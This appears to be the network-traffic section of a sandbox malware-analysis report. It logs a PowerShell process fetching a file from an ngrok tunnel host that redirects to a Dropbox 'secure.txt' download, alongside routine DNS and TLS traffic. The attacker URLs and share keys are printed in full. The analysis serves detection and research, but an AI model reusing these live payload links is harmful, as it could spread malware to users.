                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.947832108 CET5720753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.137191057 CET52107443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.253180027 CET53572071.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.337930918 CET55735443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.653053045 CET55735443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.747708082 CET52107443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.916055918 CET44352107172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.916213036 CET44352107172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.916687965 CET44352107172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.916718960 CET44352107172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.917298079 CET52107443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.918827057 CET52107443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.934048891 CET52107443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.061633110 CET44352107172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.232845068 CET44352107172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.232922077 CET44352107172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.232935905 CET44352107172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.232949018 CET44352107172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.234635115 CET52107443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.234747887 CET52107443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.249423027 CET44352107172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.250941992 CET44352107172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.254714966 CET55735443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.262207031 CET44352107172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.262770891 CET52107443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.422605038 CET44355735172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.422636986 CET44355735172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.422653913 CET44355735172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.422729969 CET44355735172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.423398018 CET55735443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.424736023 CET55735443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.436552048 CET55735443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.548201084 CET44352107172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.568428993 CET44355735172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.574631929 CET52107443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.738183022 CET44355735172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.738329887 CET44355735172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.738359928 CET44355735172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.738388062 CET44355735172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.738661051 CET55735443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.738738060 CET55735443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.751647949 CET44355735172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.752211094 CET44355735172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.752399921 CET44355735172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.752703905 CET55735443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.058078051 CET44355735172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.090600967 CET55735443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.341347933 CET55735443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.341487885 CET55735443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.656107903 CET44355735172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.658588886 CET44355735172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.676559925 CET44355735172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.676831961 CET55735443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:33.289390087 CET52107443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:33.290918112 CET52107443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:33.603648901 CET44352107172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:33.604964018 CET44352107172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:33.605617046 CET44352107172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:33.622359991 CET44352107172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:33.624090910 CET52107443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:36.445918083 CET6252653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:36.741307974 CET53625261.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:45.154947996 CET52107443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:45.155138969 CET52107443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:45.470423937 CET44352107172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:45.471642971 CET44352107172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:45.473200083 CET44352107172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:45.473387957 CET52107443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.710231066 CET52107443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.711246967 CET52107443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.712213993 CET55735443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.712661028 CET55735443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:48.024451017 CET44352107172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:48.025298119 CET44352107172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:48.025686026 CET44352107172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:48.026130915 CET44352107172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:48.026602030 CET52107443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:48.027169943 CET44355735172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:48.028002024 CET44355735172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:48.028302908 CET44355735172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:48.036585093 CET55735443192.168.2.5172.64.41.3

                                                                                                                                                                                                                                                                  ICMP Packets

                                                                                                                                                                                                                                                                  TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:24.862837076 CET192.168.2.51.1.1.1c24b(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:27.110008001 CET192.168.2.51.1.1.1c29b(Port unreachable)Destination Unreachable

                                                                                                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:07.184679985 CET192.168.2.51.1.1.10x1251Standard query (0)23glcrtmzxqgwfpq3oujitt.ngrok.pizzaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:11.335374117 CET192.168.2.51.1.1.10xc5e6Standard query (0)www.dropbox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:13.971033096 CET192.168.2.51.1.1.10x3b91Standard query (0)uc023df04e495715c365ca7fbb53.dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.722944021 CET192.168.2.51.1.1.10x3d1aStandard query (0)uc1b3e73e669a72d85958bcbe13a.dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.734770060 CET192.168.2.51.1.1.10x8f2cStandard query (0)www.dropbox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.735069036 CET192.168.2.51.1.1.10xfc7eStandard query (0)www.dropbox.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:24.027529955 CET192.168.2.51.1.1.10x6887Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:24.027785063 CET192.168.2.51.1.1.10x3b7Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:24.532501936 CET192.168.2.51.1.1.10x58b6Standard query (0)ucface448887177da6d79d4eb2fe.dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:24.540124893 CET192.168.2.51.1.1.10xfb58Standard query (0)ucface448887177da6d79d4eb2fe.dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:24.540416002 CET192.168.2.51.1.1.10x1dccStandard query (0)ucface448887177da6d79d4eb2fe.dl.dropboxusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:24.616723061 CET192.168.2.51.1.1.10x845bStandard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:24.616950989 CET192.168.2.51.1.1.10x3c0aStandard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:26.159379005 CET192.168.2.51.1.1.10xc1c0Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:26.159513950 CET192.168.2.51.1.1.10xbca5Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:26.159959078 CET192.168.2.51.1.1.10x8543Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:26.160200119 CET192.168.2.51.1.1.10x9932Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:26.169584036 CET192.168.2.51.1.1.10xe3b1Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:26.169750929 CET192.168.2.51.1.1.10xe647Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.947832108 CET192.168.2.51.1.1.10x5583Standard query (0)ucf68a874ab5d88bea64660fe73d.dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:36.445918083 CET192.168.2.51.1.1.10xc116Standard query (0)uc4dbae793261c4ce4dfc5ef2aef.dl.dropboxusercontent.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:07.591938972 CET1.1.1.1192.168.2.50x1251No error (0)23glcrtmzxqgwfpq3oujitt.ngrok.pizza3.124.142.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:07.591938972 CET1.1.1.1192.168.2.50x1251No error (0)23glcrtmzxqgwfpq3oujitt.ngrok.pizza3.125.209.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:07.591938972 CET1.1.1.1192.168.2.50x1251No error (0)23glcrtmzxqgwfpq3oujitt.ngrok.pizza3.125.223.134A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:07.591938972 CET1.1.1.1192.168.2.50x1251No error (0)23glcrtmzxqgwfpq3oujitt.ngrok.pizza18.158.249.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:07.591938972 CET1.1.1.1192.168.2.50x1251No error (0)23glcrtmzxqgwfpq3oujitt.ngrok.pizza18.192.31.165A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:07.591938972 CET1.1.1.1192.168.2.50x1251No error (0)23glcrtmzxqgwfpq3oujitt.ngrok.pizza3.125.102.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:11.472011089 CET1.1.1.1192.168.2.50xc5e6No error (0)www.dropbox.comwww-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:11.472011089 CET1.1.1.1192.168.2.50xc5e6No error (0)www-env.dropbox-dns.com162.125.69.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:14.262378931 CET1.1.1.1192.168.2.50x3b91No error (0)uc023df04e495715c365ca7fbb53.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:14.262378931 CET1.1.1.1192.168.2.50x3b91No error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.871288061 CET1.1.1.1192.168.2.50x638eNo error (0)svc.ha-teams.office.commira-tmc.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.872852087 CET1.1.1.1192.168.2.50x8f2cNo error (0)www.dropbox.comwww-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.872852087 CET1.1.1.1192.168.2.50x8f2cNo error (0)www-env.dropbox-dns.com162.125.69.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:22.020517111 CET1.1.1.1192.168.2.50x3d1aNo error (0)uc1b3e73e669a72d85958bcbe13a.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:22.020517111 CET1.1.1.1192.168.2.50x3d1aNo error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:22.030214071 CET1.1.1.1192.168.2.50xfc7eNo error (0)www.dropbox.comwww-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:22.178523064 CET1.1.1.1192.168.2.50xa84No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:22.178523064 CET1.1.1.1192.168.2.50xa84No error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:22.201575994 CET1.1.1.1192.168.2.50x7692No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:24.164855957 CET1.1.1.1192.168.2.50x3b7No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:24.258140087 CET1.1.1.1192.168.2.50x6887No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:24.753535986 CET1.1.1.1192.168.2.50x845bNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:24.753535986 CET1.1.1.1192.168.2.50x845bNo error (0)googlehosted.l.googleusercontent.com142.250.181.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:24.807574987 CET1.1.1.1192.168.2.50x58b6No error (0)ucface448887177da6d79d4eb2fe.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:24.807574987 CET1.1.1.1192.168.2.50x58b6No error (0)edge-block-www-env.dropbox-dns.com162.125.65.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:24.808350086 CET1.1.1.1192.168.2.50xfb58No error (0)ucface448887177da6d79d4eb2fe.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:24.808350086 CET1.1.1.1192.168.2.50xfb58No error (0)edge-block-www-env.dropbox-dns.com162.125.65.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:24.832066059 CET1.1.1.1192.168.2.50x1dccNo error (0)ucface448887177da6d79d4eb2fe.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:24.862685919 CET1.1.1.1192.168.2.50x3c0aNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:26.296510935 CET1.1.1.1192.168.2.50xbca5No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:26.296547890 CET1.1.1.1192.168.2.50xc1c0No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:26.296547890 CET1.1.1.1192.168.2.50xc1c0No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:26.296664000 CET1.1.1.1192.168.2.50x8543No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:26.296664000 CET1.1.1.1192.168.2.50x8543No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:26.296936035 CET1.1.1.1192.168.2.50x9932No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:26.306664944 CET1.1.1.1192.168.2.50xe647No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:26.306715965 CET1.1.1.1192.168.2.50xe3b1No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:26.306715965 CET1.1.1.1192.168.2.50xe3b1No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.253180027 CET1.1.1.1192.168.2.50x5583No error (0)ucf68a874ab5d88bea64660fe73d.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.253180027 CET1.1.1.1192.168.2.50x5583No error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:36.741307974 CET1.1.1.1192.168.2.50xc116No error (0)uc4dbae793261c4ce4dfc5ef2aef.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:36.741307974 CET1.1.1.1192.168.2.50xc116No error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:23.728677988 CET1.1.1.1192.168.2.50x3cdcNo error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:23.728677988 CET1.1.1.1192.168.2.50x3cdcNo error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:24.727904081 CET1.1.1.1192.168.2.50x3cdcNo error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:24.727904081 CET1.1.1.1192.168.2.50x3cdcNo error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:25.733387947 CET1.1.1.1192.168.2.50x3cdcNo error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:25.733387947 CET1.1.1.1192.168.2.50x3cdcNo error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:27.747133970 CET1.1.1.1192.168.2.50x3cdcNo error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:27.747133970 CET1.1.1.1192.168.2.50x3cdcNo error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:31.759248018 CET1.1.1.1192.168.2.50x3cdcNo error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:31.759248018 CET1.1.1.1192.168.2.50x3cdcNo error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                  • 23glcrtmzxqgwfpq3oujitt.ngrok.pizza
                                                                                                                                                                                                                                                                  • www.dropbox.com
                                                                                                                                                                                                                                                                  • uc023df04e495715c365ca7fbb53.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                  • uc1b3e73e669a72d85958bcbe13a.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                  • ucface448887177da6d79d4eb2fe.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                  • clients2.googleusercontent.com
                                                                                                                                                                                                                                                                  • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                  • ucf68a874ab5d88bea64660fe73d.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                  • uc4dbae793261c4ce4dfc5ef2aef.dl.dropboxusercontent.com

                                                                                                                                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  0192.168.2.5497043.124.142.2054431440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:09 UTC223OUTGET /api/secure/f08a7638d48ba191b651003837c0a34d HTTP/1.1
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                  Host: 23glcrtmzxqgwfpq3oujitt.ngrok.pizza
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  2024-12-19 12:44:11 UTC321INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Content-Length: 395
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:11 GMT
                                                                                                                                                                                                                                                                  Location: https://www.dropbox.com/scl/fi/wf5wpi8bl6ww5u4qyuqt2/secure.txt?rlkey=wmur9sahbystk50935h0aqsmc&dl=1
                                                                                                                                                                                                                                                                  Server: Werkzeug/3.0.3 Python/3.12.8
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-12-19 12:44:11 UTC395INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 73 68 6f 75 6c 64 20 62 65 20 72 65 64 69 72 65 63 74 65 64 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 74 6f 20 74 68 65 20 74 61 72 67 65 74 20 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 72 6f 70 62 6f 78 2e 63 6f 6d 2f 73 63 6c 2f 66 69 2f 77 66 35 77 70 69 38 62 6c 36 77 77 35 75 34 71 79 75 71 74 32 2f 73 65 63 75 72 65 2e 74 78 74 3f 72 6c 6b 65 79 3d 77 6d 75 72 39 73 61 68 62 79 73 74 6b 35 30 39 33 35 68 30 61 71 73 6d 63 26 61 6d 70 3b
                                                                                                                                                                                                                                                                  Data Ascii: <!doctype html><html lang=en><title>Redirecting...</title><h1>Redirecting...</h1><p>You should be redirected automatically to the target URL: <a href="https://www.dropbox.com/scl/fi/wf5wpi8bl6ww5u4qyuqt2/secure.txt?rlkey=wmur9sahbystk50935h0aqsmc&amp;


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  1192.168.2.549705162.125.69.184431440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:12 UTC236OUTGET /scl/fi/wf5wpi8bl6ww5u4qyuqt2/secure.txt?rlkey=wmur9sahbystk50935h0aqsmc&dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                  Host: www.dropbox.com
